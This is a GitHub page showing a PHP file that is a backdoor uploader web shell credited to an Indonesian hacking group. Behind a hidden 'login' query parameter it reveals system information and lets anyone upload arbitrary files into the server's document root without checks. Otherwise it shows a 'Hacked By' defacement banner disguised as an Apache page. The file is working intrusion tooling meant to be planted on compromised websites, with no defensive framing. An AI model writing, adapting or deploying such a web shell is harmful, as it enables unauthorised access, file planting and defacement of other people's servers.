php/up.php at master · agusdwiaryanto/php · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
<?php
if(isset($_GET['login'])){
?>
<?php
echo "Uploader by VrCy - IndoXploit<br>";

echo "<b>".php_uname()."</b><br>";

echo "<form method='post' enctype='multipart/form-data'>

	  <input type='file' name='idx_file'>

	  <input type='submit' name='upload' value='upload'>

	  </form>";

$root = $_SERVER['DOCUMENT_ROOT'];

$files = $_FILES['idx_file']['name'];

$dest = $root.'/'.$files;

if(isset($_POST['upload'])) {

	if(is_writable($root)) {

		if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {

			$web = "http://".$_SERVER['HTTP_HOST']."/";

			echo "sukses upload -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";

		} else {

			echo "gagal upload di document root.";

		}

	} else {

		if(@copy($_FILES['idx_file']['tmp_name'], $files)) {

			echo "sukses upload <b>$files</b> di folder ini";

		} else {

			echo "gagal upload";

		}

	}

}
}
else{
echo "<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>VrCy</TITLE>
</HEAD><BODY>

<h1>Hacked By VrCy | CowoKerensTeam</h1>


";
echo "<address>Apache Server at ".$_SERVER['HTTP_HOST']." Port 80</address>";
}
?>
</center>
</html>